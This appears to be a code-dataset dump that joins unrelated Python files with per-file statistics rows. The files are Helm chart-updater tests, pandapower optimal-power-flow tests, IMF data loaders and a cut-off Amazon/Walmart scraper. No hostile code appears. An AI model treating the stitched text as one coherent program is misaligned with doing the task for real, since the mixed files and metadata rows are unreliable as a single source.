    assert re.search(INITIAL_COMMIT_RE, _last_commit())


def test_chart_updated_manifest_inside_path(empty_git_repo, requests_mock):
    mkdir("deploy")
    _add_manifest(MANIFEST_WITH_GLOB_PATTERN, path="deploy/helmrelease.yaml")
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo, git_path="deploy/"), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert (
        _get_manifest("deploy/helmrelease.yaml") == UPDATED_MANIFEST_WITH_GLOB_PATTERN
    )
    assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())


def test_does_not_crash_for_multidoc(empty_git_repo, requests_mock):
    mkdir("deploy")
    _add_manifest(MANIFEST_WITH_MULTIPLE_DOCUMENTS, path="deploy/1-multi.yaml")
    _add_manifest(MANIFEST_WITH_SINGLE_IMAGE, path="deploy/2-helmrelease.yaml")
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest("deploy/1-multi.yaml") == MANIFEST_WITH_MULTIPLE_DOCUMENTS
    assert (
        _get_manifest("deploy/2-helmrelease.yaml") == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
    )
    assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())


def test_does_not_crash_for_empty_annotation(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_EMPTY, path="1-empty.yaml")
    _add_manifest(MANIFEST_WITH_SINGLE_IMAGE, path="2-helmrelease.yaml")
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest("1-empty.yaml") == MANIFEST_EMPTY
    assert _get_manifest("2-helmrelease.yaml") == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
    assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())


def test_chart_updated_flux2(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_FLUX2)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_FLUX2
    assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())


def test_chart_no_relevant_annotations(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_NO_RELEVANT_ANNOTATIONS)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_NO_RELEVANT_ANNOTATIONS


def _add_manifest(content: str, path: str = MANIFEST_PATH) -> None:
    with open(path, "w") as f:
        f.write(content)
    run(["git", "add", path])


def _init_commit():
    run(["git", "commit", "-m", "Init"])
    run(["git", "checkout", "-b", "test"])


def _last_commit():
    run(["git", "checkout", "master"])
    return run(["git", "show", "HEAD"], stdout=PIPE, text=True, check=True).stdout


def _get_manifest(path: str = MANIFEST_PATH):
    with open(path, "r") as f:
        return f.read()
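# --- Editor's note (not part of the original file): the glob and regex
# halves of the "rossum.ai/chart-version" annotation exercised above map
# naturally onto the standard library. A hedged sketch, not the
# chart-updater implementation (which also supports semver ranges):
import fnmatch
import re


def _sketch_version_matches(pattern, version):
    # Split "glob:1.2.*" / "regex:1\.2\..*" into a kind and an expression.
    kind, _, expr = pattern.partition(":")
    if kind == "glob":
        return fnmatch.fnmatch(version, expr)
    if kind == "regex":
        return re.fullmatch(expr, version) is not None
    raise ValueError("unsupported pattern kind: %r" % kind)


assert _sketch_version_matches("glob:1.2.*", "1.2.4")
assert not _sketch_version_matches("regex:1\\.2\\..*", "1.3.0")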
| 26.60989 | 88 | 0.736114 | 2,053 | 14,529 | 4.884559 | 0.075986 | 0.046669 | 0.035899 | 0.045772 | 0.866972 | 0.843139 | 0.818508 | 0.802553 | 0.772138 | 0.741623 | 0 | 0.025334 | 0.149632 | 14,529 | 545 | 89 | 26.658716 | 0.786321 | 0 | 0 | 0.733925 | 0 | 0.004435 | 0.413105 | 0.091954 | 0 | 0 | 0 | 0 | 0.068736 | 1 | 0.042129 | false | 0 | 0.013304 | 0 | 0.059867 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f921e9429d83ea39bff31bb458872fdae5f55af4 | 47 | py | Python | src/beehive/data/__init__.py | i-pan/kaggle-rsna-pe | 81ca9ee45014b7ef1647000492a4ef5fbad7126f | ["Apache-2.0"] | 17 | 2020-11-03T21:08:44.000Z | 2021-09-17T10:54:55.000Z | src/beehive/data/__init__.py | i-pan/honeycomb | 1f5f8c6c37f2a66b3109412e803994a9dc6ad10d | ["MIT"] | 1 | 2020-03-04T15:47:52.000Z | 2020-03-04T15:47:52.000Z | src/beehive/data/__init__.py | i-pan/kaggle-rsna-pe | 81ca9ee45014b7ef1647000492a4ef5fbad7126f | ["Apache-2.0"] | 6 | 2020-11-21T18:01:23.000Z | 2022-03-05T05:32:41.000Z |
from . import datasets
from . import transforms
| 23.5
| 24
| 0.808511
| 6
| 47
| 6.333333
| 0.666667
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 47
| 2
| 24
| 23.5
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
006f3756b91a45c4095cdacefc62c63ccb6e94b4
| 14,338
|
py
|
Python
|
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
pandapower/test/test_opf.py
|
lucassm/cigre-montecarlo
|
fd354b9c3ade460b46687ba312f51212dad17151
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
import pytest
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
def test_simplest_voltage():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=100)
pp.create_ext_grid(net, 0)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_ext_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_eg_voltage():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50)
pp.create_ext_grid(net, 0, vm_pu=1.01)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_ext_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert net.res_bus.vm_pu.at[0] == net.ext_grid.vm_pu.values
assert net.OPF_converged
def test_simplest_dispatch():
""" Testing a very simple network without transformer for voltage
constraints with OPF """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_gen(net, 1, p_kw=-100, controllable=True, max_p_kw=-150, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=100)
pp.create_ext_grid(net, 0, cost_per_kw=101)
pp.create_load(net, 1, p_kw=20)
pp.create_line_from_parameters(net, 0, 1, 50, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100*690)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_simplest_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_est_grid:\n%s" % net.res_ext_grid)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_opf_gen_voltage():
""" Testing a simple network with transformer for voltage
constraints with OPF using a generator """
# boundaries:
vm_max = 1.05
vm_min = 0.95
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=200)
pp.create_gen(net, 3, p_kw=-10, controllable=True, max_p_kw=-25, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=-100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100000)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=100000)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# check and assert result
logger.debug("test_opf_gen_voltage")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert min(net.res_bus.vm_pu) > vm_min
assert net.OPF_converged
def test_opf_sgen_voltage():
""" Testing a simple network with transformer for voltage
constraints with OPF using a static generator """
# boundaries
vm_max = 1.04
vm_min = 0.96
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=1000000)
pp.create_sgen(net, 3, p_kw=-10, controllable=True, max_p_kw=-15, min_p_kw=-5,
max_q_kvar=25, min_q_kvar=-25, cost_per_kw=-100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=1000000)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=1000000)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_sgen_voltage")
logger.debug("res_sgen:\n%s" % net.res_sgen)
logger.debug("res_bus.vm_pu: \n%s" % net.res_bus.vm_pu)
assert max(net.res_bus.vm_pu) < vm_max
assert net.OPF_converged
def test_opf_gen_loading():
""" Testing a simple network with transformer for loading
constraints with OPF using a generator """
# wide open voltage boundaries to make sure they don't interfere with loading constraints
vm_max = 1.5
vm_min = 0.5
max_line_loading = 11
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75,
tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0,
vn_hv_kv=10.0, vscr_percent=2.8125,
tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751,
sn_kva=16.0, pfe_kw=0.11, name=None,
in_service=True, index=None, max_loading_percent=145)
pp.create_gen(net, 3, p_kw=-10, controllable=True, max_p_kw=-15, min_p_kw=-5, max_q_kvar=50,
min_q_kvar=-50, cost_per_kw=-100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_gen_loading")
logger.debug("res_gen:\n%s" % net.res_gen)
logger.debug("res_line.loading_percent:\n%s" % net.res_line.loading_percent)
assert max(net.res_line.loading_percent) < max_line_loading
logger.debug("res_trafo.loading_percent:\n%s" % net.res_trafo.loading_percent)
assert max(net.res_trafo.loading_percent) < 145
assert net.OPF_converged
def test_opf_sgen_loading():
""" Testing a simple network with transformer for loading
constraints with OPF using a generator """
# boundaries
vm_max = 1.5
vm_min = 0.5
max_trafo_loading = 800
max_line_loading = 13
# create net
net = pp.create_empty_network()
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75, tp_max=2, vn_lv_kv=0.4,
shift_degree=150, tp_mid=0, vn_hv_kv=10.0,
vscr_percent=2.8125, tp_pos=0, tp_side="hv", tp_min=-2,
tp_st_percent=2.5, i0_percent=0.68751, sn_kva=16.0,
pfe_kw=0.11, name=None, in_service=True, index=None,
max_loading_percent=max_trafo_loading)
pp.create_sgen(net, 3, p_kw=-10, controllable=True, max_p_kw=-15, min_p_kw=-5, max_q_kvar=25,
min_q_kvar=-25, cost_per_kw=-100)
pp.create_ext_grid(net, 0)
pp.create_line_from_parameters(net, 1, 2, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
pp.create_line_from_parameters(net, 2, 3, 1, name="line2", r_ohm_per_km=0.876,
c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
max_loading_percent=max_line_loading)
# run OPF
pp.runopp(net, verbose=False)
assert net["OPF_converged"]
# assert and check result
logger.debug("test_opf_sgen_loading")
logger.debug("res_sgen:\n%s" % net.res_sgen)
logger.debug("res_line.loading_percent:\n%s" % net.res_line.loading_percent)
assert max(net.res_line.loading_percent) < max_line_loading
logger.debug("res_trafo.loading_percent:\n%s" % net.res_trafo.loading_percent)
assert max(net.res_trafo.loading_percent) < max_trafo_loading
assert net.OPF_converged
#def test_opf_oberrhein():
# """ Testing a simple network with transformer for loading
# constraints with OPF using a generator """
# import pandapower.networks as nw
# # create net
# net = nw.ms_oberrhein_balanced()
## net = nw.ms_oberrhein_radial()
# net.bus["max_vm_pu"]=1.1
# net.bus["min_vm_pu"]=0.9
# net.line["max_loading_percent"]=200
# net.trafo["max_loading_percent"]=100
# net.sgen["max_p_kw"]=-net.sgen.sn_kva
# net.sgen["min_p_kw"]=0
# net.sgen["max_q_kvar"]=1
# net.sgen["min_q_kvar"]=-1
# net.sgen["controllable"] =1
# # run OPF
# pp.runopp(net, verbose=False)
## assert net["OPF_converged"]
if __name__ == "__main__":
""" test for optimal power flow using default cost function "maxp"
"""
# import time
# t = time.time()
pytest.main(["test_opf.py", "-s"])
# elapsed = time.time()-t
logger.setLevel("DEBUG")
# test_simplest_voltage()
# test_simplest_dispatch()
# test_opf_gen_voltage()
# test_opf_sgen_voltage()
# test_opf_gen_loading()
# test_opf_sgen_loading()
# test_eg_voltage()
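# A hedged refactoring sketch (not part of the original suite): the four-bus
# network that the tests above rebuild by hand could come from one helper.
# All parameter values are copied from the tests; only the helper itself is new.
def _four_bus_net(vm_max, vm_min, max_trafo_loading, max_line_loading):
    net = pp.create_empty_network()
    pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=10.)
    for _ in range(3):
        pp.create_bus(net, max_vm_pu=vm_max, min_vm_pu=vm_min, vn_kv=.4)
    pp.create_transformer_from_parameters(net, 0, 1, vsc_percent=3.75, tp_max=2, vn_lv_kv=0.4,
                                          shift_degree=150, tp_mid=0, vn_hv_kv=10.0,
                                          vscr_percent=2.8125, tp_pos=0, tp_side="hv", tp_min=-2,
                                          tp_st_percent=2.5, i0_percent=0.68751, sn_kva=16.0,
                                          pfe_kw=0.11, max_loading_percent=max_trafo_loading)
    pp.create_ext_grid(net, 0)
    for from_bus, to_bus in ((1, 2), (2, 3)):
        pp.create_line_from_parameters(net, from_bus, to_bus, 1, name="line2", r_ohm_per_km=0.876,
                                       c_nf_per_km=260.0, imax_ka=0.123, x_ohm_per_km=0.1159876,
                                       max_loading_percent=max_line_loading)
    return net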
| 43.448485
| 99
| 0.616474
| 2,328
| 14,338
| 3.460911
| 0.087629
| 0.031774
| 0.03649
| 0.029043
| 0.868189
| 0.856522
| 0.846841
| 0.842994
| 0.834306
| 0.829589
| 0
| 0.065463
| 0.270191
| 14,338
| 330
| 100
| 43.448485
| 0.704511
| 0.155601
| 0
| 0.763285
| 0
| 0
| 0.056727
| 0.018741
| 0
| 0
| 0
| 0
| 0.115942
| 1
| 0.033816
| false
| 0
| 0.019324
| 0
| 0.05314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0084b78aba40e66e766070896b94858bed19f9cc
| 4,306
|
py
|
Python
|
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | 1
|
2021-04-23T21:27:24.000Z
|
2021-04-23T21:27:24.000Z
|
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | null | null | null |
qnt/data/imf.py
|
nadhem-zmandar/toolbox
|
2aa038af0e2c3cb027b8b93a2d7331815c5cad07
|
[
"MIT"
] | null | null | null |
"""
There are currency and commodity data. (origin: https://imf.org)
"""
from qnt.data.common import *
def load_currency_list():
"""
Loads currency list (origin: https://imf.org)
:return:
"""
track_event("DATA_IMF_CURRENCY_LIST")
uri = "imf.org/currency/list"
js = request_with_retry(uri, None)
js = js.decode()
idx = json.loads(js)
return idx
def load_currency_data(
assets: tp.Union[None, tp.List[tp.Union[str,dict]]] = None,
min_date: tp.Union[str, datetime.date, None] = None,
max_date: tp.Union[str, datetime.date, None] = None,
tail: tp.Union[datetime.timedelta, float, int] = DEFAULT_TAIL,
dims: tp.Tuple[str, str] = (ds.TIME, ds.ASSET),
forward_order: bool = True,
):
"""
Loads currency timeseries (origin: https://imf.org)
:param assets:
:param min_date:
:param max_date:
:param tail:
:param dims:
:param forward_order:
:return:
"""
track_event("DATA_IMF_CURRENCY_DATA")
max_date = parse_date(max_date)
if min_date is not None:
min_date = parse_date(min_date)
else:
min_date = max_date - parse_tail(tail)
uri = "imf.org/currency/data"
raw = request_with_retry(uri, None)
if raw is None:
arr = xr.DataArray(
[[np.nan]],
dims=[ds.TIME, ds.ASSET],
coords={
ds.TIME: pd.DatetimeIndex([max_date]),
ds.ASSET: ['']
}
)[:,1:]
else:
arr = xr.open_dataarray(raw, cache=True, decode_times=True)
arr = arr.compute()
arr = arr.sel(time=slice(max_date,min_date))
if assets is not None:
arr = arr.broadcast_like(xr.DataArray(assets, dims='asset', coords={'asset':assets}))
arr = arr.sel(asset=assets)
if forward_order:
arr = arr.sel(**{ds.TIME: slice(None, None, -1)})
arr = arr.dropna(ds.TIME, 'all')
arr.name = "imf_currency"
return arr.transpose(*dims)
def load_commodity_list():
"""
Loads commodity list (origin: https://imf.org)
:return:
"""
track_event("DATA_IMF_COMMODITY_LIST")
uri = "imf.org/commodity/list"
js = request_with_retry(uri, None)
js = js.decode()
idx = json.loads(js)
return idx
def load_commodity_data(
assets: tp.Union[None, tp.List[tp.Union[str,dict]]] = None,
min_date: tp.Union[str, datetime.date, None] = None,
max_date: tp.Union[str, datetime.date, None] = None,
tail: tp.Union[datetime.timedelta, float, int] = DEFAULT_TAIL,
dims: tp.Tuple[str, str] = (ds.TIME, ds.ASSET),
forward_order: bool = True,
):
"""
Loads commodity timeseries (origin: https://imf.org)
:param assets:
:param min_date:
:param max_date:
:param tail:
:param dims:
:param forward_order:
:return:
"""
track_event("DATA_IMF_COMMODITY_DATA")
max_date = parse_date(max_date)
if min_date is not None:
min_date = parse_date(min_date)
else:
min_date = max_date - parse_tail(tail)
uri = "imf.org/commodity/data"
raw = request_with_retry(uri, None)
if raw is None:
arr = xr.DataArray(
[[np.nan]],
dims=[ds.TIME, ds.ASSET],
coords={
ds.TIME: pd.DatetimeIndex([max_date]),
ds.ASSET: ['']
}
)[:,1:]
else:
arr = xr.open_dataarray(raw, cache=True, decode_times=True)
arr = arr.compute()
arr = arr.sel(time=slice(max_date,min_date))
if assets is not None:
arr = arr.broadcast_like(xr.DataArray(assets, dims='asset', coords={'asset':assets}))
arr = arr.sel(asset=assets)
if forward_order:
arr = arr.sel(**{ds.TIME: slice(None, None, -1)})
arr = arr.dropna(ds.TIME, 'all')
arr.name = "imf_commodity"
return arr.transpose(*dims)
if __name__ == '__main__':
cl = load_currency_list()
print('currency list', json.dumps(cl, indent=1))
cd = load_currency_data(tail=60, assets=['EUR'])
print('currency data', cd.to_pandas())
cl = load_commodity_list()
print('commodity list', json.dumps(cl, indent=1))
cd = load_commodity_data(tail=600, assets=['PSOYB'])
print('commodity data', cd.to_pandas())
| 27.602564
| 93
| 0.597306
| 580
| 4,306
| 4.262069
| 0.162069
| 0.039644
| 0.024272
| 0.034385
| 0.805825
| 0.805825
| 0.792071
| 0.792071
| 0.769417
| 0.769417
| 0
| 0.003442
| 0.25778
| 4,306
| 156
| 94
| 27.602564
| 0.770025
| 0.114491
| 0
| 0.734694
| 0
| 0
| 0.080707
| 0.047826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.010204
| 0
| 0.091837
| 0.040816
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
00949a7d12854e717c61c3408e8563d640bd2e89
| 7,133
|
py
|
Python
|
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | null | null | null |
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | 5
|
2021-09-28T19:09:24.000Z
|
2021-09-28T19:17:31.000Z
|
ProductCheck/product_check/product_scraping.py
|
nirajlavani/SmartShopper
|
f18e579400babdb2dbc978b4721ea8970bfec332
|
[
"MIT"
] | 1
|
2021-10-17T01:19:59.000Z
|
2021-10-17T01:19:59.000Z
|
import json
from selenium import webdriver
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
from django.conf import settings
class AmazonScrapper:
"""
Responsible for scraping Amazon data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = None
def parse_page_content(self, soup):
try:
self.product_name = soup.find(id='productTitle').get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', {"id": "priceblock_ourprice"})
if self.product_price:
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
else:
self.product_price = soup.find('span', {"id": "priceblock_dealprice"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"class": "a-icon-alt"}).get_text()
except Exception as e:
self.product_review_score = 'BAD REQUEST'
try:
soup.select('#availability .a-color-state')[0].get_text().strip()
self.product_availability = 'Out of Stock'
except:
self.product_availability = 'Available'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Amazon scraping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
return self.__dict__
class WalmartScrapper:
"""
Responsible for scraping Walmart data.
"""
def __init__(self, url):
self.product_url = url
self.product_name = None
self.product_price = None
self.product_review_score = None
self.product_availability = 'Available'
def parse_page_content(self, soup):
try:
self.product_name = soup.find('h1', {"itemprop": "name"}).get_text().strip()
except Exception as e:
self.product_name = 'BAD REQUEST'
try:
self.product_price = soup.find('span', {"itemprop" : "price"})
self.product_price = float(self.product_price.get_text().replace('$', '').replace(',', '').strip())
except Exception as e:
self.product_price = 'BAD REQUEST'
try:
self.product_review_score = soup.find('span', {"class" : "f7 rating-number"}).get_text() + ' out of 5 stars'
except Exception as e:
self.product_review_score = 'BAD REQUEST'
def fetch_product_details(self):
"""
Initializes webdriver and configures several options specific to Walmart scraping.
"""
options = webdriver.ChromeOptions()
options.add_argument('--incognito')
options.add_argument('--headless')
options.add_argument('--disable-extensions')
options.add_argument('disable-infobars')
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)
driver.get(self.product_url)
soup = BeautifulSoup(driver.page_source, 'html.parser')
self.parse_page_content(soup)
